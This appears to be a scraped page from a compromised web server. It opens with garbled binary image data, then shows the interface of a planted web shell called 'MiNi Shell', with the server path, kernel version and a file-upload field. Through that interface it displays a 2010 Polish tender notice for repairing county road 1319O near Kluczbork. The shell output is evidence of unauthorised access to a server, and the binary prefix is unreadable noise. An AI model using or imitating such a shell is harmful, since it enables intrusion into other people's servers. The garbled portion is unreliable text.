JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100106/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100106/2907-N-2010.html

<p class="kh_header"><b>Kluczbork: Remont drogi powiatowej Nr 1319O Ligota Dolna - Bogacica - Jasienie od km 0+000,00 do km 13+702,00.</b><br>
<b>Numer ogłoszenia: 2907 - 2010; data zamieszczenia: 06.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych , ul. Jagiellońska 3, 46-200 Kluczbork, woj. opolskie, tel. 077 4186161, faks 077 4186066.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zdp.nowoczesnagmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont drogi powiatowej Nr 1319O Ligota Dolna - Bogacica - Jasienie od km 0+000,00 do km 13+702,00..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont drogi powiatowej Nr 1319O Ligota Dolna - Bogacica - Jasienie na odcinku od km 0+000,00 do km 13+702,00.
Zamówienie obejmuje m.in.:
1. Frezowanie nawierzchni
2. Remont nawierzchni bitumicznej poprzez wykonanie warstwy wyrównawczo - profilującej o grubości min. 2,0 cm oraz nowej warstwy ścieralnej o grubości 4,0 cm, z betonu asfaltowego. Szerokość jezdni pozostawia się bez zmian i wynosi 5,00 - 6,00 m.
3. Wykonanie  ciągów pieszo-rowerowych o nawierzchni bitumicznej 
4. Wykonanie ścinki poboczy
5. Oczyszczenie rowów z namułu z profilowaniem skarp.
6. Oczyszczenie przepustu pod koroną drogi - 10 m.
7. Wymiana uszkodzonych rur przepustu drogowego zlokalizowanego pod koroną drogi 10 m.
8. Demontaż całości oznakowania pionowego z wymianą na nowe.
9. Odnowienie oznakowania poziomego.
10. Ustawienie barier ochronnych na trzech przepustach - 40 m
11. Wycinka łącznie 164 szt. drzew, karczowanie 171 szt. pni, frezowanie 28 szt. pni; uprzątnięcie terenu po wycince (oczyszczenie terenu z odpadów, tj. pozostałości po wycince); 
Odkupienie 100% pozyskanego drewna wg cen i ilości wynikających z protokołu brakarskiego, wykazu drzew i wyceny, jak niżej:

Drewno użytkowe
I grupa  - topola, lipa, kasztan
II grupa - klon, brzoza, akacja
III grupa - jesion

Ilości pozyskanego drewna użytkowego 
I grupa - 3,64 m3 - 15% kora = 3,09 m3
II grupa  - 2,70 m3 - 15% kora = 2,30 m3
II grupa  - 1,52 m3 - 15% kora = 1,29 m3

Wycena pozyskanego drewna użytkowego:
I grupa 100,00 zł x 3,09 m3 = 309,00 zł (netto) + 67,98 zł (podatek VAT 22%) = 376,98 zł (brutto)
II grupa 120,00 zł x 2,30 m3 = 276,00 zł (netto) + 60,72 zł (podatek VAT 22%) = 336,72 zł (brutto)
III grupa 140,00 zł x 1,29 m3 = 180,60 zł (netto) + 39,73 zł (podatek VAT 22%) = 220,33 zł (brutto)
Wycena pozyskanego drewna opałowego:
153,52 m3 x 50,00 zł/ m3 = 7.676,00 zł (netto) + 535,32 zł (podatek VAT 7%) = 8.213,32 zł (brutto)

Szczegółowo przedmiot zamówienia określony został w Dokumentacji Projektowej obejmującej Projekt budowlano-wykonawczy, Specyfikacje Techniczne i Przedmiar robót.

Miejsce wykonywania zamówienia: droga powiatowa Nr 1319O Ligota Dolna - Bogacica - Jasienie, gmina Kluczbork, Lasowice Wielkie, powiat kluczborski, woj. opolskie.


Zakres zamówienia obejmuje m.in.: 
- frezowanie nawierzchni: 27.742 m2
- wykonanie warstwy odsączającej o gr. 10 cm: 7.268 m2
- wykonanie dolnej warstwy podbudowy z kruszywa łamanego na poszerzeniach: 6.663 m2
- wykonanie górnej warstwy podbudowy z kruszywa łamanego o gr. 8 cm: 93,0 m2
- wyrównanie nawierzchni betonem asfaltowym: 1 589 Mg 
- wykonanie warstwy wiążącej z betonu asfaltowego o gr. 2 cm: 64.156 m2 
- wykonanie warstwy ścieralnej z mieszanki mineralno-bitumicznej o gr. 4 cm poza jezdnią: 5.519 m2
- wykonanie warstwy ścieralnej z mieszanki mineralno-bitumicznej o gr. 7 cm poza jezdnią: 5.817 m2
- wykonanie warstwy ścieralnej z mieszanki mineralno-bitumicznej o gr. 4 cm: 64.156 m2
- wykonanie ścinki poboczy: 19.318 m2 
- wykonanie ciągów pieszo-rowerowych o nawierzchni bitumicznej: 5.519 m
- oczyszczenie rowów z namułu z profilowaniem skarp: 15.137 m
- oczyszczenie przepustu pod koroną drogi - 1 szt. / 10 m
- wymiana uszkodzonych rur przepustu pod koroną drogi - 1 szt. / 10 m 
- pionowe znaki drogowe: 176 szt., 45,14 m2 (tablice) 
- oznakowanie poziome drogi: 770,28 m2
- ustawienie barier ochronnych na trzech przepustach - 40 m
- wycinka drzew: 164 szt. 
- karczowanie pni: 171 szt. 
- frezowanie pni: 28 szt. 

W ramach zamówienia Wykonawca zobowiązany będzie również do:
- opracowania  i zatwierdzenia projektu organizacji ruchu na czas budowy,
- wykonania i utrzymania oznakowania w trakcie prowadzenia robót oraz rozbiórki po zakończeniu robót,
- organizacji placu budowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.23.20.00-2, 45.11.10.00-8, 77.21.14.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Kwota wadium wymagana do wzięcia udziału w postępowaniu: 100.000,00 zł
Dopuszczalne formy wadium:
- Pieniądz (przelew na rachunek bankowy: Bank Spółdzielczy w Wołczynie Oddział w Kluczborku Nr: 61 88760009 0036 4549 2000 0002);
- Poręczenia bankowe lub poręczenia spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- Gwarancje bankowe;
- Gwarancje ubezpieczeniowe;
- Poręczenia udzielane przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
Potwierdzenie wniesienia wadium należy dołączyć do oferty. Oferta nie zabezpieczona akceptowalną formą wadium zostanie odrzucona bez rozpatrywania.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy spełniają warunki określone w ustawie Prawo Zamówień Publicznych w art. 22 ust. 1 pkt 1 - 4 i nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2, tj.:
1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2. posiadają wiedzę i doświadczenie;
3. dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4. spełniają warunki dotyczące sytuacji ekonomicznej i finansowej.
w tym spełniają niżej wymienione warunki szczegółowe:
1. Wykonali w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, roboty budowlane, odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia. 
Należy wykazać przynajmniej jedną budowę lub przebudowę lub remont drogi o nawierzchni bitumicznej o wartości min. 1 500 000 zł z potwierdzeniem, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
2. Dysponują osobami legitymującymi się doświadczeniem i kwalifikacjami odpowiednimi do funkcji, jakie zostaną im powierzone lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia tych osób. Wykonawca przedstawi wraz z ofertą w wykazie osób osobę, na niżej wymienione stanowisko, dla którego wymagane są następujące kwalifikacje i doświadczenie: 
- kierownik budowy - uprawnienia budowlane do kierowania robotami w branży drogowej oraz przynależność do Izby Inżynierów Budownictwa, doświadczenie zawodowe - co najmniej 3 lata od uzyskania uprawnień.
3. Posiadają opłaconą polisę ubezpieczeniową, lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej na kwotę nie niższą niż 2 000 000 zł w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.

Z postępowania o udzielenie zamówienia zamawiający wykluczy wykonawców zgodnie z art. 24 ust. 1 i 2 ustawy Pzp  

W/w wymagania mają zastosowanie do wszystkich Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia.
Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
a. Ocena spełnienia przez Wykonawców w/ w warunków, na zasadzie spełnia/ nie spełnia nastąpi na podstawie dokumentów dołączonych do oferty.
b. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że podane warunki szczegółowe spełniają łącznie wszyscy Wykonawcy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Formularz oferty.
2. Dowód wniesienia wadium.
3. Kosztorys ofertowy.
4. Oświadczenie wykonawcy o spełnieniu warunków w związku z art. 22 i 24 Ustawy Prawo zamówień publicznych i braku podstaw do wykluczenia.
5. Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert wg rozporządzenia.
6. Oświadczenie osób fizycznych w zakresie art. 24. ust. 1 pkt 2 ustawy Pzp.
7. Wykaz wykonanych w ciągu ostatnich pięciu lat robót budowlanych, odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania.
8. Dokumenty potwierdzające, że wykazane roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
9. Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia. 
Wykaz musi zawierać dane na temat kwalifikacji wskazanych osób, potwierdzające spełnienie warunku w zakresie potencjału kadrowego. W przypadku, gdy wykonawca wskaże w wykazie osoby, którymi będzie dysponował, musi załączyć pisemne zobowiązanie innych podmiotów do udostępnienia tych osób. 
10. Polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
11. Zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia (jeżeli dotyczy).
12. Pełnomocnictwo do podpisywania oferty, jeżeli nie wynika wprost z rejestru, w formie oryginału lub potwierdzone notarialnie (jeżeli dotyczy)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://zdp.nowoczesnagmina.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Kluczborku
ul. Jagiellońska 3, 46-200 Kluczbork, pok. nr 9.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2010 godzina 10:55, miejsce: Zarząd Dróg Powiatowych w Kluczborku
ul. Jagiellońska 3, 46-200 Kluczbork, pok. nr 10 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com